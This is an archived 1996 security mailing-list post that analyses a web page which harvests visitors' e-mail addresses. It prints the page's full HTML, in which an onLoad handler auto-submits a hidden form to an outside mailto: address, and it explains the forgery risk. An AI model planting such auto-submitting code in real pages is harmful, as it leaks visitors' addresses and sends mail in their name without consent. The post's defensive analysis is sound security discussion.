Re: JavaScript to grab e-mail <explained>

• To: www-managers@lists.stanford.edu, www-security@ns2.rutgers.edu
• Subject: Re: JavaScript to grab e-mail <explained>
• From: Lincoln Stein <lstein@kaa.crbm.cnrs-mop.fr>
• Date: Mon, 26 Feb 1996 16:52:30 +0100
• Cc: lstein@pico.crbm.cnrs-mop.fr

I just had a look at the e-mail scamming script (URL
http://www.popco.com/grabtest.htm).  It's quite simple.  Here's the
complete text:

<HTML>
<HEAD>
</HEAD>
<BODY onLoad="document.mailme.submit()">

<form method=post name="mailme"
      action="mailto:reply@simenon.popco.com?subject=scammed address">

<h3>Viewing this page automatically submits email to an 
address which then sends you back email to prove it grabbed the message.</h3>

<input type=hidden name="scammed.the.address" value="did it">
</form>

</BODY>
</HTML>

Basically what the script does is to make the browser submit e-mail to
the indicated mailto: URL.  When the mail is sent, the user's reply
address is included as a matter of course.

The good news is that this does _not_ represent a general security
hole in JavaScript itself.  I was concerned that someone had
discovered a way to make JavaScript divulge such browser secrets as
the contents of the disk cache, history list, or newsgroup
subscriptions.  

The bad news is that this technique can be used as a general Internet
e-mail forgery system.  Anybody accessing a particular page will
unwittingly mail out an e-mail message, whose recipient, subject and
message body are all under the control of the JavaScript author.  If
the message is traced back, it will be found to have originated from
the user's machine.

Lincoln

• Re: JavaScript to grab e-mail
• From: eric.hammond@sdrc.com (Eric Hammond)

• Previous: Re: JavaScript to grab e-mail
• Next: Re: _DNS_ security problems
• Index(es):
  • Index
  • Thread